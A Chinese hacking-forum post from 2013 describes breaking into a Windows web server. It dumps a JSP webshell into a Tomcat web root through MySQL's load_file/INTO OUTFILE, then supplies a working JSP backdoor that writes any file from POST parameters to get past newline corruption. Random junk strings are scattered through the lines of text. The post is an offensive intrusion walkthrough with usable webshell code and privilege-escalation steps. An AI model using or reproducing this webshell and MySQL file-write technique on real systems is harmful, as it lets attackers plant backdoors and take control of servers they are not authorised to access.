找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2483|回复: 0
打印 上一主题 下一主题

解决Win下MySQL root导出Webshell换行符问题

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:52:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天碰到了这么个问题,简单记录一下我的解决方案。' ^2 k, r; G% ]; X$ @2 r* K
0 t! c; \, g" y% X/ B
首先说一下服务器的环境。服务器的80端口按照标准的虚拟主机来配置的,支持asp,aspx,php,但是不支持php8 m4 [, o( g/ K
安装了mssql(1433端口),tomcat(8080端口),serv-u(43958端口)和两个mysql(3306端口和3307端口)/ N0 B/ R3 N$ w- [5 X) ^
提权的时候没有sa密码,没有serv-u密码,mysql 5.1首先运行了, B+ i$ w! |! B
1 show variables like '%plugin%';
& I, Q, o3 t+ m) ^后,根据设置导出dll到C:\Program Files\MySQL\MySQL Server 5.1\lib\成功/ w& P" b7 d$ p. w0 |
创建自定义函数似乎被拦截,一直失败。
3 `2 D6 X2 f4 z4 z; c" t# x" m) V6 ]后找到tomcat目录,准备写马,asp,aspx,php对tomcat目录:C:/Program Files/cngradms_x86/tomcat/webapps/ROOT/均无写入权限
6 a, g5 a5 W6 Q, B测试mysql有写入权限。故上传jsp大马至网站web目录:d:\xxx\fuck.jsp' |' G9 V1 [( a! V6 S
用mysql执行语句:
3 _) y- u6 ^* l& c  z' `: Y& O2 o1 select load_file('d:\\xxx\\fuck.jsp')  into outfile 'C:\\Program Files\\cngradms_x86\\tomcat\\webapps\\ROOT\\upload\\fuck.jsp'
: l6 D4 L# _; E( |& y, u1 Z7 m4 Y2 复制代码+ ]7 F" R' ^  Z; }+ ^( p( t
后成功。& y" ~% H( T0 S, q
但是访问后得到如下提示:/ f6 t: t6 O& U
​500页面
/ _2 d( W1 y8 A" _: M7 u- M5 w% t& k: X. [. P0 i

4 ?% v& E0 L6 L$ i- J$ i8 b明显是MySQL的Win下版本自动添加转义符\n\r了
1 b9 w6 u: P" C. }& }7 G这样导致程序运行的悲剧。  Z. h0 |4 m5 j4 Q; E) q9 _
从网上找了很多方法,什么update把转义符消掉,enclose巴拉巴拉,反正五花八门就是没一个可以用的。) J# p" A! \/ _0 M0 _$ e
最后弄了这么个小脚本:
% X8 Q$ A- @- f! E9 F01 <%@ page language="java" pageEncoding="gbk"%>
7 H' n' y: a  s6 x3 c4 f% `/ ^& u02 <jsp:directive.page import="java.io.File"/>
/ u) ?, x- d2 U03 <jsp:directive.page import="java.io.OutputStream"/>
# U$ L7 n9 @% a$ s8 w& t' X- [" _04 <jsp:directive.page import="java.io.FileOutputStream"/>: P/ R* h, X  V
05 <% int i=0;String method=request.getParameter("act");if(method!=null&&method.equals("yoco")){String url=request.getParameter("url");String text=request.getParameter("smart");File f=new File(url);if(f.exists()){f.delete();}try{OutputStream o=new FileOutputStream(f);o.write(text.getBytes());o.close();}catch(Exception e){i++;%>
- i- a  U2 t% J" e7 n06 error www.2cto.com
& v+ h# f8 H! ]8 P# [* w" ?4 J07 <%}}if(i==0){%>
8 F: l) m+ l2 o, n1 n& B08 ok) E& M: P9 j" L* O
09 <%}%>
5 ^1 b+ j5 E* |! o4 k10 <form action='?act=yoco' method='post'><input size="100" value="<%=application.getRealPath("/") %>" name="url"><br><textarea rows="20" cols="80" name="smart">
7 J; @# P- q3 q8 I就可以避免转义符让JSP的马儿运行500错误了。3 u, }% F# S) T6 I4 \2 U9 I, e
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表